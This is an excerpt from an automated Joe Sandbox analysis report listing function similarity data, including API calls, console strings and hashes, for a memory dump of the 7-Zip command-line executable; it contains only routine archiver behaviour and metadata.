                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: ConsoleMode$Handlefflushfputs
                              • String ID: Enter password (will not be echoed):
                              • API String ID: 108775803-3720017889
                              • Opcode ID: 294733341af0c6423e331d47aac37afd9992fb5f9bb59514f82aa2bedaed80ed
                              • Instruction ID: 8db25abcbce6ed07766e34da78f3ed0eb87272ef340da1ccadba2eae71bce4f3
                              • Instruction Fuzzy Hash: 8A210D2270564383FE24DB65AE55B7D6361AB84BB0F184239DE5A477E0DF7CC886E300
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                               • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: CriticalSectionfputs$EnterLeavefree
                              • String ID: :
                              • API String ID: 1989314732-3653984579
                              • Opcode ID: 839a38f73333893f4eccaf74ee40085ba4c2aa8ed87444e9d780be2ae8fb8cfa
                              • Instruction ID: 40875d1f53f254e486bbe4ea6e0b3d7f5e0fba9f42f8b014a5892ce0ac1bd927
                              • Instruction Fuzzy Hash: 85311C36200A86C1DB61DF25D8817AD3371FBD4B98F484136DE8D87669DF78C88AE351
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                               • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: fputsfree
                              • String ID: Cannot open the file$The archive is open with offset$The file is open$WARNING:
                              • API String ID: 2581285248-1259944392
                              • Opcode ID: 49505d1af8e5d22842aace44d1ece2333f2758bb853eaa62245607bc15223ccb
                              • Instruction ID: d828d1dd022fed76eaa5b7316f8bb6848238b7a39b1340f95b3c6c15433f8578
                              • Instruction Fuzzy Hash: A521C766300A4295CE34EB16EC517A93322F789BE8F484227DF4E87765DF6CC586E300
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                               • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: AddressProc$HandleModule
                              • String ID: FindFirstStreamW$FindNextStreamW$kernel32.dll
                              • API String ID: 667068680-4044117955
                              • Opcode ID: dd25da05bc82ba6021c17f9e44052074488abcd980775d277f0d9dc0a26f7085
                              • Instruction ID: 365592ed9f295837116d80b3675a5d3f035b36b18a9dbd1f68f0b1aa3cf9b9b8
                              • Instruction Fuzzy Hash: B2E09265652A0BC1EE649B52BC9877823A6FB89796F841137C85D86B20EE688199E300
                              APIs
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                               • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: free
                              • String ID:
                              • API String ID: 1294909896-0
                              APIs
                              Similarity
                              • API ID: free
                              • String ID:
                              • API String ID: 1294909896-0
                              APIs
                              Similarity
                              • API ID: free$memmove
                              • String ID:
                              • API String ID: 1534225298-0
                              APIs
                              Similarity
                              • API ID: freememmove$ExceptionThrowmalloc
                              • String ID:
                              • API String ID: 1818558235-0
                              APIs
                              Similarity
                              • API ID: free
                              • String ID:
                              • API String ID: 1294909896-0
                              APIs
                              Similarity
                              • API ID: free
                              • String ID:
                              • API String ID: 1294909896-0
                              APIs
                              Similarity
                              • API ID: free
                              • String ID:
                              • API String ID: 1294909896-0
                              APIs
                              Similarity
                              • API ID: free
                              • String ID:
                              • API String ID: 1294909896-0
                              APIs
                              Similarity
                              • API ID: free
                              • String ID:
                              • API String ID: 1294909896-0
                              APIs
                              Similarity
                              • API ID: free
                              • String ID:
                              • API String ID: 1294909896-0
                              APIs
                              Similarity
                              • API ID: free
                              • String ID:
                              • API String ID: 1294909896-0
                              APIs
                              Similarity
                              • API ID: free
                              • String ID:
                              • API String ID: 1294909896-0
                              APIs
                              Similarity
                              • API ID: free
                              • String ID:
                              • API String ID: 1294909896-0
                              APIs
                              Similarity
                              • API ID: free$fputsmemset
                              • String ID:
                              • API String ID: 469995913-0
                              APIs
                              Similarity
                              • API ID: free$memmovewcscmp
                              • String ID:
                              • API String ID: 3584677832-0
                              APIs
                              Strings
                              Similarity
                              • API ID: free
                              • String ID: Incorrect switch postfix:$Multiple instances for switch:$Too long switch:$Too short switch:$Unknown switch:
                              • API String ID: 1294909896-2104980125
                              APIs
                              Strings
                              Similarity
                              • API ID: free$memmove
                              • String ID: #
                              • API String ID: 1534225298-1885708031
                              APIs
                              Strings
                              Similarity
                              • API ID: free
                              • String ID: -bit$DIRS$PGP$TAG$ZERO
                              • API String ID: 1294909896-2593822073
                              APIs
                                • Part of subcall function 00F738A8: free.MSVCRT ref: 00F738E0
                                • Part of subcall function 00FA8580: wcscmp.MSVCRT ref: 00FA8642
                                • Part of subcall function 00FA8580: free.MSVCRT ref: 00FA866E
                                • Part of subcall function 00FA8580: free.MSVCRT ref: 00FA8678
                                • Part of subcall function 00FA8580: free.MSVCRT ref: 00FA86B5
                                • Part of subcall function 00FA8580: free.MSVCRT ref: 00FA86BD
                                • Part of subcall function 00FA8580: free.MSVCRT ref: 00FA86CB
                                • Part of subcall function 00FA8580: free.MSVCRT ref: 00FA86F9
                                • Part of subcall function 00FA8580: free.MSVCRT ref: 00FA8701
                                • Part of subcall function 00FA8580: free.MSVCRT ref: 00FA870F
                              • free.MSVCRT ref: 00FA2331
                              • free.MSVCRT ref: 00FA233F
                                • Part of subcall function 00FB5A44: _CxxThrowException.MSVCRT ref: 00FB5A74
                                • Part of subcall function 00FB5A44: memmove.MSVCRT ref: 00FB5AAD
                                • Part of subcall function 00FB5A44: free.MSVCRT ref: 00FB5AB5
                                • Part of subcall function 00F72350: malloc.MSVCRT ref: 00F72360
                                • Part of subcall function 00F72350: _CxxThrowException.MSVCRT ref: 00F7237B
                              • free.MSVCRT ref: 00FA23A1
                              Strings
                              Similarity
                              • API ID: free$ExceptionThrow$mallocmemmovewcscmp
                              • String ID: A0$Hash$sha256 sha512 sha224 sha384 sha1 sha md5 crc32 crc64 asc cksum
                              • API String ID: 1621466233-3656212537
                              APIs
                                • Part of subcall function 00F7D298: GetModuleHandleW.KERNEL32 ref: 00F7D2D4
                                • Part of subcall function 00F7D298: GetProcAddress.KERNEL32 ref: 00F7D2ED
                                • Part of subcall function 00F7D298: free.MSVCRT ref: 00F7D40F
                                • Part of subcall function 00F7D298: free.MSVCRT ref: 00F7D41A
                                • Part of subcall function 00F7CC68: GetSystemInfo.KERNEL32 ref: 00F7CC88
                              • strcmp.MSVCRT ref: 00F7D66A
                              • free.MSVCRT ref: 00F7D6C9
                              • free.MSVCRT ref: 00F7D6D4
                              • free.MSVCRT ref: 00F7D6DF
                              • free.MSVCRT ref: 00F7D71B
                              Similarity
                              • API ID: free$AddressHandleInfoModuleProcSystemstrcmp
                              • String ID: -
                              • API String ID: 3961349729-3695764949
                              APIs
                              • free.MSVCRT ref: 00FC2460
                                • Part of subcall function 00FCB4D0: memset.MSVCRT ref: 00FCB515
                                • Part of subcall function 00FCB4D0: fputs.MSVCRT ref: 00FCB53A
                              Similarity
                              • API ID: fputsfreememset
                              • String ID: Alternate streams$Alternate streams size$Files$Folders$Size
                              • API String ID: 3433497869-232602582
                              Similarity
                              • API ID: free$FileMove
                              • String ID:
                              • API String ID: 288606353-0
                              APIs
                                • Part of subcall function 00F782EC: FindClose.KERNELBASE ref: 00F782FE
                              • SetLastError.KERNEL32 ref: 00F7854A
                              • SetLastError.KERNEL32 ref: 00F78559
                              • FindFirstStreamW.KERNELBASE ref: 00F7857B
                              • GetLastError.KERNEL32 ref: 00F7858A
                              Similarity
                              • API ID: ErrorLast$Find$CloseFirstStream
                              • String ID:
                              • API String ID: 4071060300-0
                              Similarity
                              • API ID: freememmove$CompareCriticalEnterFileSectionTime
                              • String ID:
                              • API String ID: 706800807-0
                              Similarity
                              • API ID: fputsfree$memset
                              • String ID: Name$Size
                              • API String ID: 219391080-481755742
                              Strings
                              • (Y)es / (N)o / (A)lways / (S)kip all / A(u)to rename all / (Q)uit? , xrefs: 00FCD052
                              Similarity
                              • API ID: fputsfree
                              • String ID: (Y)es / (N)o / (A)lways / (S)kip all / A(u)to rename all / (Q)uit?
                              • API String ID: 2581285248-171671738
                              Similarity
                              • API ID: free$memmove
                              • String ID:
                              • API String ID: 1534225298-0
                              Similarity
                              • API ID: fputs$fputc
                              • String ID: Time =
                              • API String ID: 1185151155-458291097
                              APIs
                              • fputs.MSVCRT ref: 00FCBF9D
                              • free.MSVCRT ref: 00FCBFA9
                                • Part of subcall function 00FCB4D0: memset.MSVCRT ref: 00FCB515
                                • Part of subcall function 00FCB4D0: fputs.MSVCRT ref: 00FCB53A
                              Similarity
                              • API ID: fputs$freememset
                              • String ID: Archive size: $Files read from disk$Volumes:
                              • API String ID: 2276422817-73833580
                              Similarity
                              • API ID: free
                              • String ID:
                              • API String ID: 1294909896-0
                              APIs
                              • fputs.MSVCRT ref: 00FC6DF0
                                • Part of subcall function 00F72790: fputs.MSVCRT ref: 00F727D9
                                • Part of subcall function 00F72790: free.MSVCRT ref: 00F727E5
                                • Part of subcall function 00F72790: free.MSVCRT ref: 00F727F0
                                • Part of subcall function 00F724C4: fputc.MSVCRT ref: 00F724D5
                              • free.MSVCRT ref: 00FC6E22
                              • fputs.MSVCRT ref: 00FC6E40
                              Similarity
                              • API ID: fputsfree$fputc
                              • String ID: : $----------------
                              • API String ID: 3584323934-4071417161
                              APIs
                              • fputs.MSVCRT ref: 00FCBE42
                                • Part of subcall function 00FCB4D0: memset.MSVCRT ref: 00FCB515
                                • Part of subcall function 00FCB4D0: fputs.MSVCRT ref: 00FCB53A
                              • fputs.MSVCRT ref: 00FCBE6F
                              Similarity
                              • API ID: fputs$memset
                              • String ID: Creating archive: $StdOut$Updating archive:
                              • API String ID: 3543874852-1319951512
                              Similarity
                              • API ID: free
                              • String ID:
                              • API String ID: 1294909896-0
                              APIs
                              • fputs.MSVCRT ref: 00FCC000
                                • Part of subcall function 00F72790: fputs.MSVCRT ref: 00F727D9
                                • Part of subcall function 00F72790: free.MSVCRT ref: 00F727E5
                                • Part of subcall function 00F72790: free.MSVCRT ref: 00F727F0
                              • fputs.MSVCRT ref: 00FCC043
                                • Part of subcall function 00F724C4: fputc.MSVCRT ref: 00F724D5
                              • free.MSVCRT ref: 00FCC057
                              Similarity
                              • API ID: fputsfree$fputc
                              • String ID: : $Write SFX:
                              • API String ID: 3584323934-2530961540
                              Similarity
                              • API ID: free
                              • String ID:
                              • API String ID: 1294909896-0
                              Similarity
                              • API ID: strcmp
                              • String ID: =
                              • API String ID: 1004003707-2525689732
                              APIs
                              Similarity
                              • API ID: free
                              • String ID:
                              • API String ID: 1294909896-0
                              Strings
                              Similarity
                              • API ID:
                              • String ID: Q
                              • API String ID: 0-3463352047
                              APIs
                              Similarity
                              • API ID: free$memmove
                              • String ID:
                              • API String ID: 1534225298-0
                              APIs
                              Strings
                              Similarity
                              • API ID: free
                              • String ID: act:$ cpus:$ gran:$ page:
                              • API String ID: 1294909896-454015223
                              APIs
                              • free.MSVCRT ref: 00F844C5
                              • _CxxThrowException.MSVCRT ref: 00F845B9
                                • Part of subcall function 00F840EC: _CxxThrowException.MSVCRT ref: 00F841CC
                              • _CxxThrowException.MSVCRT ref: 00F845EE
                              Strings
                              • Empty file path, xrefs: 00F8459C
                              • There is no second file name for rename pair:, xrefs: 00F845D1
                              Similarity
                              • API ID: ExceptionThrow$free
                              • String ID: Empty file path$There is no second file name for rename pair:
                              • API String ID: 3129652135-1725603831
                              APIs
                              Strings
                              Similarity
                              • API ID: free
                              • String ID: #
                              • API String ID: 1294909896-1885708031
                              APIs
                              Similarity
                              • API ID: ByteCharExceptionMultiThrowWide$ErrorLast
                              • String ID:
                              • API String ID: 2296236218-0
                              APIs
                              Similarity
                              • API ID: ErrorFileLastSecurity$free
                              • String ID:
                              • API String ID: 3917221116-0
                              APIs
                              Similarity
                              • API ID: free$wcscmp
                              • String ID:
                              • API String ID: 4021281200-0
                              APIs
                              Similarity
                              • API ID: File$Create$CloseHandleTimefree
                              • String ID:
                              • API String ID: 234454789-0
                              APIs
                              • GetCurrentDirectoryW.KERNEL32 ref: 00F7759A
                              • GetCurrentDirectoryW.KERNEL32 ref: 00F775F4
                              • free.MSVCRT ref: 00F77606
                                • Part of subcall function 00F73730: free.MSVCRT ref: 00F7376A
                                • Part of subcall function 00F73730: memmove.MSVCRT(00000000,?,?,00000000,00F710B0), ref: 00F73785
                              Similarity
                              • API ID: CurrentDirectoryfree$memmove
                              • String ID:
                              • API String ID: 4010226229-0
                              APIs
                              Similarity
                              • API ID: memcmp
                              • String ID:
                              • API String ID: 1475443563-0
                              APIs
                              Similarity
                              • API ID: memcmp
                              • String ID:
                              • API String ID: 1475443563-0
                              APIs
                              Similarity
                              • API ID: memcmp
                              • String ID:
                              • API String ID: 1475443563-0
                              APIs
                              • free.MSVCRT ref: 00F8E621
                                • Part of subcall function 00F8E1DC: memset.MSVCRT ref: 00F8E1FF
                                • Part of subcall function 00F8E1DC: strlen.MSVCRT ref: 00F8E21E
                              Strings
                              Similarity
                              • API ID: freememsetstrlen
                              • String ID: ?$ MB$, # $RAM
                              • API String ID: 2062123303-3586855483
                              APIs
                                • Part of subcall function 00F7C684: RegOpenKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,Path64,00FA6FAE), ref: 00F7C6AF
                                • Part of subcall function 00F7C59C: RegQueryValueExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,80000001), ref: 00F7C5EA
                                • Part of subcall function 00F7C59C: RegQueryValueExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,80000001), ref: 00F7C638
                              • free.MSVCRT ref: 00FA7027
                                • Part of subcall function 00F73798: free.MSVCRT ref: 00F737C4
                                • Part of subcall function 00F73798: memmove.MSVCRT ref: 00F737DF
                                • Part of subcall function 00F79164: free.MSVCRT ref: 00F791EC
                              • free.MSVCRT ref: 00FA700F
                              • free.MSVCRT ref: 00FA701A
                              Strings
                              Similarity
                              • API ID: free$QueryValue$Openmemmove
                              • String ID: 7z.dll$Software\7-zip
                              • API String ID: 2771487249-1558686312
                              APIs
                              Similarity
                              • API ID: fputs$free
                              • String ID:
                              • API String ID: 3873070119-0
                              APIs
                              Similarity
                              • API ID: CreateDirectoryfree$ErrorLast
                              • String ID:
                              • API String ID: 3252411863-0
                              Similarity
                              • API ID: free
                              • String ID:
                              • API String ID: 1294909896-0
                              • Opcode ID: 57756d85c65f05cda8d1a774ccd206aecd44e4c111d0521ad48d3dc7cc5f1731
                              • Instruction ID: 482a7761764bf4e3857394a85fec31193a8544bce58ffc352454ba8a0e314c46
                              • Opcode Fuzzy Hash: 57756d85c65f05cda8d1a774ccd206aecd44e4c111d0521ad48d3dc7cc5f1731
                              • Instruction Fuzzy Hash: 7BF03A1374660A42CB86F736E86127E6310EBC7F91F84A4229E0E1B311DE3DC5A7A615
                              Similarity
                              • API ID: free
                              • String ID:
                              • API String ID: 1294909896-0
                              • Opcode ID: 08845d820ad8a366d5d4bd19e7b6d5ca9f480e4a13f5d0935fdc3c213a3a5d05
                              • Instruction ID: 3bab221eff1ef052055517a0ef59857c93ed0f02febce64adc1f2d2962bc9186
                              • Opcode Fuzzy Hash: 08845d820ad8a366d5d4bd19e7b6d5ca9f480e4a13f5d0935fdc3c213a3a5d05
                              • Instruction Fuzzy Hash: F8F0685370168989CB90FE66EC9116C27209F96BE8B5C8532FF0D1F754DE29CC629350
                              Similarity
                              • API ID: free
                              • String ID:
                              • API String ID: 1294909896-0
                              • Opcode ID: 75a5f18dca9dfb400c00d5047afe98c59e73a89a94cd2149e7029f224defeac9
                              • Instruction ID: c648789f5d11b7a7d5af942cbe44adbafd5f327f8b45c830f14132aaa9d3e1a7
                              • Opcode Fuzzy Hash: 75a5f18dca9dfb400c00d5047afe98c59e73a89a94cd2149e7029f224defeac9
                              • Instruction Fuzzy Hash: 9FF0C893B01A8489CB90BE66EC8115C23109F56BE9F4C8132BF0D1F744DF29CCA39350
                              Similarity
                              • API ID: free
                              • String ID:
                              • API String ID: 1294909896-0
                              • Opcode ID: 6ba20e383c5cd0500879b364b40f6d610812b00baf9de314c07cc055ac161e38
                              • Instruction ID: 2727697fe5054046945cc9d6a193c7120fafff2bd235c106023bda7f32056eca
                              • Opcode Fuzzy Hash: 6ba20e383c5cd0500879b364b40f6d610812b00baf9de314c07cc055ac161e38
                              • Instruction Fuzzy Hash: 3CE0285261050981CBD4FF76DC9102C3324E7D5F44B5450139E1D9F215CD1ECC63A391
                              APIs
                              • fputs.MSVCRT ref: 00FCC0F9
                              • fputs.MSVCRT ref: 00FCC137
                                • Part of subcall function 00FCB4D0: memset.MSVCRT ref: 00FCB515
                                • Part of subcall function 00FCB4D0: fputs.MSVCRT ref: 00FCB53A
                              Similarity
                              • API ID: fputs$memset
                              • String ID: : Removing files after including to archive$Removing
                              • API String ID: 3543874852-1218467041
                              • Opcode ID: a4a5c5f2e2ed0fc3699a4b4d5ab354da92a1930d9a75827637bdf74ba3ea48d2
                              • Instruction ID: 56b4c40604c58af97d6939c55a4ece609ed73aa0b0ca222fde2943daefd12cc1
                              • Opcode Fuzzy Hash: a4a5c5f2e2ed0fc3699a4b4d5ab354da92a1930d9a75827637bdf74ba3ea48d2
                              • Instruction Fuzzy Hash: 07319E62600A8292DE78EB35E8567ED7361E740758F48C427DB9F46162DF7CD4CAE300
                              APIs
                              • FormatMessageW.KERNEL32 ref: 00F76DAB
                              • LocalFree.KERNEL32 ref: 00F76DCD
                                • Part of subcall function 00F738A8: free.MSVCRT ref: 00F738E0
                              Strings
                              • Error #, xrefs: 00F76E49
                              • Internal Error: The failure in hardware (RAM or CPU), OS or program, xrefs: 00F76D6F
                              Similarity
                              • API ID: FormatFreeLocalMessagefree
                              • String ID: Error #$Internal Error: The failure in hardware (RAM or CPU), OS or program
                              • API String ID: 1548054572-2710258398
                              • Opcode ID: 41c7a38d39f7a366ebb840e5a8ecbd33c65445bff81c0bcaf35595811ff3ce38
                              • Instruction ID: 1ac192363fb3eca9e2e91f06d4941f29e454979ef1c86c23c6eb817170d63eda
                              • Opcode Fuzzy Hash: 41c7a38d39f7a366ebb840e5a8ecbd33c65445bff81c0bcaf35595811ff3ce38
                              • Instruction Fuzzy Hash: 5D31C036714A8196CB70DF15E44075D73A2E7C5BA0F548227DA8D87754DB7CC188EB22
                              APIs
                              • fputs.MSVCRT ref: 00FCC84D
                              • fputs.MSVCRT ref: 00FCC85D
                              • free.MSVCRT ref: 00FCC8A3
                                • Part of subcall function 00FCB4D0: memset.MSVCRT ref: 00FCB515
                                • Part of subcall function 00FCB4D0: fputs.MSVCRT ref: 00FCB53A
                              Similarity
                              • API ID: fputs$freememset
                              • String ID: :
                              • API String ID: 2276422817-3653984579
                              • Opcode ID: bf51fc24a28999f906349a3871acf52267a47cb870f45fcd5bfd45cafda63ced
                              • Instruction ID: 157484353b9afb286a2e37ae8a6a90ec80593e575a898beb45e6e72e14b6d5c3
                              • Opcode Fuzzy Hash: bf51fc24a28999f906349a3871acf52267a47cb870f45fcd5bfd45cafda63ced
                              • Instruction Fuzzy Hash: 6F11E41270064282CA68EB25DD5176D7321FBC4BB4F488636DE1E43796DF3CC495A300
                              APIs
                              • fputs.MSVCRT ref: 00FCBBB7
                              • free.MSVCRT ref: 00FCBBD6
                                • Part of subcall function 00FCB4D0: memset.MSVCRT ref: 00FCB515
                                • Part of subcall function 00FCB4D0: fputs.MSVCRT ref: 00FCB53A
                              Similarity
                              • API ID: fputs$freememset
                              • String ID: ERROR: $WARNING:
                              • API String ID: 2276422817-2114518728
                              • Opcode ID: c9337f9c4ca69ffa5780f91b31773c4e6559dbf201a4c98eb23e454be8c4651a
                              • Instruction ID: 33a3816cb49beca5b47cc5cec96b64f04a982b6d26de41866d1e42842a5528ac
                              • Opcode Fuzzy Hash: c9337f9c4ca69ffa5780f91b31773c4e6559dbf201a4c98eb23e454be8c4651a
                              • Instruction Fuzzy Hash: 6011E912701A4141DA68EF26ED52B7D3311E785BE0F4882379E2F07392DF2CC885E301
                              APIs
                              • EnterCriticalSection.KERNEL32 ref: 00FC08ED
                              • fputs.MSVCRT ref: 00FC0955
                                • Part of subcall function 00FCB4D0: memset.MSVCRT ref: 00FCB515
                                • Part of subcall function 00FCB4D0: fputs.MSVCRT ref: 00FCB53A
                              • LeaveCriticalSection.KERNEL32 ref: 00FC0993
                              Similarity
                              • API ID: CriticalSectionfputs$EnterLeavememset
                              • String ID: ERROR:
                              • API String ID: 2331179553-977468659
                              • Opcode ID: 466621b1c3de3273fbd47d703df1a077b0369dc6d621ab67cd3b5968bca88ceb
                              • Instruction ID: 587e72ffa1e02fa7fb8c3ff7117f331f23984eff0281332840b52a3b676bef66
                              • Opcode Fuzzy Hash: 466621b1c3de3273fbd47d703df1a077b0369dc6d621ab67cd3b5968bca88ceb
                              • Instruction Fuzzy Hash: 3F115A3631094381EB19DF25D951BBC2332EBD4FA5F1881369E1E4BB56CF38888AE310
                              Similarity
                              • API ID:
                              • String ID: a$z
                              • API String ID: 0-4151050625
                              • Opcode ID: 6ae0dc97e00bf20445782d7632547404e64b5bc7cdb6d7c8bcc16cb23f98946c
                              • Instruction ID: 34d724d187a3e394de3bd4972f9f05c245f47f88c43af506b327fa8ff24d773a
                              • Opcode Fuzzy Hash: 6ae0dc97e00bf20445782d7632547404e64b5bc7cdb6d7c8bcc16cb23f98946c
                              • Instruction Fuzzy Hash: 41016942F4905685EBB67B1AA9443F8A752A765BB6F8DC1338F1E07311EA184AD1F303
                              Similarity
                              • API ID: AddressHandleModuleProc
                              • String ID: RtlGetVersion$ntdll.dll
                              • API String ID: 1646373207-1489217083
                              • Opcode ID: 3270b66177bae0e4f37cbf032a5b585ff5bf23b06b314f74da539d27339d0187
                              • Instruction ID: d21f93b1ce97b5419d58471554fbcb40fc872f0a3252ad7237e510cb36899c01
                              • Opcode Fuzzy Hash: 3270b66177bae0e4f37cbf032a5b585ff5bf23b06b314f74da539d27339d0187
                              • Instruction Fuzzy Hash: B7F06232A0510596EF30EB20F4443B923E1E79A329F544837D70E42750DF7CC955EE02
                              APIs
                              • fputs.MSVCRT ref: 00FCBD9B
                              • fputs.MSVCRT ref: 00FCBDC8
                                • Part of subcall function 00F72790: fputs.MSVCRT ref: 00F727D9
                                • Part of subcall function 00F72790: free.MSVCRT ref: 00F727E5
                                • Part of subcall function 00F72790: free.MSVCRT ref: 00F727F0
                              Similarity
                              • API ID: fputs$free
                              • String ID: Open archive: $StdOut
                              • API String ID: 3873070119-2401103298
                              • Opcode ID: 4e91ddbeab93c2d72459f93409c67ee03fab2be40fed6645fabcfa7b4743dad9
                              • Instruction ID: 441b5b51bea284da26a58db71d2d52c90d61b3fb5f8dbafe37eb6587cc4a9a7d
                              • Opcode Fuzzy Hash: 4e91ddbeab93c2d72459f93409c67ee03fab2be40fed6645fabcfa7b4743dad9
                              • Instruction Fuzzy Hash: F7F089A530098282CF54DF25DA8576C2322EB44FD4F18D4338D0E4B718DF18C4C9D310
                              Similarity
                              • API ID: fputs$fputc
                              • String ID: $:
                              • API String ID: 1185151155-4041779174
                              • Opcode ID: ec6c24268499b5c22fe0a13979c60313f5df506e5d120099ed6475117c24e543
                              • Instruction ID: 6c8ea777bca9d69934d9dfa0b1b3ba7d996f759236b9a7f9b11aa800946f3a9a
                              • Opcode Fuzzy Hash: ec6c24268499b5c22fe0a13979c60313f5df506e5d120099ed6475117c24e543
                              • Instruction Fuzzy Hash: 71E06D9630478082CB25DB2AE94436D6322EB99FDCF488123DE8E07B5ADE2CC148CB11
                              Similarity
                              • API ID: AddressHandleModuleProc
                              • String ID: GetLargePageMinimum$kernel32.dll
                              • API String ID: 1646373207-2515562745
                              • Opcode ID: 8e9a9dab5b7f2e19df094af4520333db7a13ff35ee5bd9949f6b110a8c73edde
                              • Instruction ID: 1a65f401ac3793e68eb980c9f3afe96bf51d12f283ac2cb924029f62feb20035
                              • Opcode Fuzzy Hash: 8e9a9dab5b7f2e19df094af4520333db7a13ff35ee5bd9949f6b110a8c73edde
                              • Instruction Fuzzy Hash: FFE09A25752B07C1EE25DB51BCA53382365BB88751F84053A840E82B60EF3CD505E301
                              APIs
                                • Part of subcall function 00F73730: free.MSVCRT ref: 00F7376A
                                • Part of subcall function 00F73730: memmove.MSVCRT(00000000,?,?,00000000,00F710B0), ref: 00F73785
                              • free.MSVCRT ref: 00F7B9EE
                              • free.MSVCRT ref: 00F7BB01
                              • free.MSVCRT ref: 00F7BB4B
                              Similarity
                              • API ID: free$memmove
                              • String ID:
                              • API String ID: 1534225298-0
                              • Opcode ID: f6a79e1e2e53c5d128062005ef24517dc4d8bc9b2001797f74a16cc3843fae74
                              • Instruction ID: 7a1053c113f5bf096a16ebe843f588d0b05d4dfb577e9b33f6f0393017142203
                              • Opcode Fuzzy Hash: f6a79e1e2e53c5d128062005ef24517dc4d8bc9b2001797f74a16cc3843fae74
                              • Instruction Fuzzy Hash: 3141B96321854095CA20FF19D49016EB721EBD6790B449123FE9F47629DF3CC946FB43
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 73b97f750171db4c521c0c1b0c7efb8e366ee69d85245091a69d9f14588f1804
                              • Instruction ID: 9e4c5b1b94121ab73be8db29cee2ac75ade423a24d31a89c2d304d2f0ec85caf
                              • Opcode Fuzzy Hash: 73b97f750171db4c521c0c1b0c7efb8e366ee69d85245091a69d9f14588f1804
                              • Instruction Fuzzy Hash: FD411723715B8056EB60EE22D9502AD7360F785BF4F089212EE9E0BB54DF3CC951EB02
                              Similarity
                              • API ID: ErrorLastfree
                              • String ID:
                              • API String ID: 2167247754-0
                              • Opcode ID: 9e5ac0819ccd73d860c5bb0ac35cb87d2fcfabdfe1c81ef86ca79644d4d74276
                              • Instruction ID: 3b5299c5148543ddd311d5e2c335710a3442519f2924128e9ce9c8213d52782e
                              • Opcode Fuzzy Hash: 9e5ac0819ccd73d860c5bb0ac35cb87d2fcfabdfe1c81ef86ca79644d4d74276
                              • Instruction Fuzzy Hash: D931E71321454095DA70AB24ED5176E7320E7D53F4F418313BAAE87AA5DE2CC886F703
                              Similarity
                              • API ID: free$ErrorLastmemmove
                              • String ID:
                              • API String ID: 3561842085-0
                              • Opcode ID: 91663e74d70eaacb513d60a4784cfbb330a645ba5be1881762ea54d7b565f1b6
                              • Instruction ID: 2fc56864a3343fa4c9dd3a5dc8d19230bc5fa254b21f47f89de866b32308caea
                              • Opcode Fuzzy Hash: 91663e74d70eaacb513d60a4784cfbb330a645ba5be1881762ea54d7b565f1b6
                              • Instruction Fuzzy Hash: 9021D12220868250EF60EB25EC403AA7320EBC17F0F444226EEAD475A5DE6CC94AE711
                               Similarity
                               • API ID: memcmp
                               Similarity
                               • API ID: memcmp
                              APIs
                              • MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00F74272
                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00F7427E
                              • _CxxThrowException.MSVCRT ref: 00F7429C
                              • MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00F742C8
                              • _CxxThrowException.MSVCRT ref: 00F742E6
                               Similarity
                               • API ID: ByteCharExceptionMultiThrowWide$ErrorLast
                               Similarity
                               • API ID: free
                               Similarity
                               • API ID: free
                              APIs
                              • free.MSVCRT ref: 00F9C057
                                • Part of subcall function 00F98E64: free.MSVCRT ref: 00F98E74
                                • Part of subcall function 00F98E64: free.MSVCRT ref: 00F98E7D
                                • Part of subcall function 00F98E64: free.MSVCRT ref: 00F98EA8
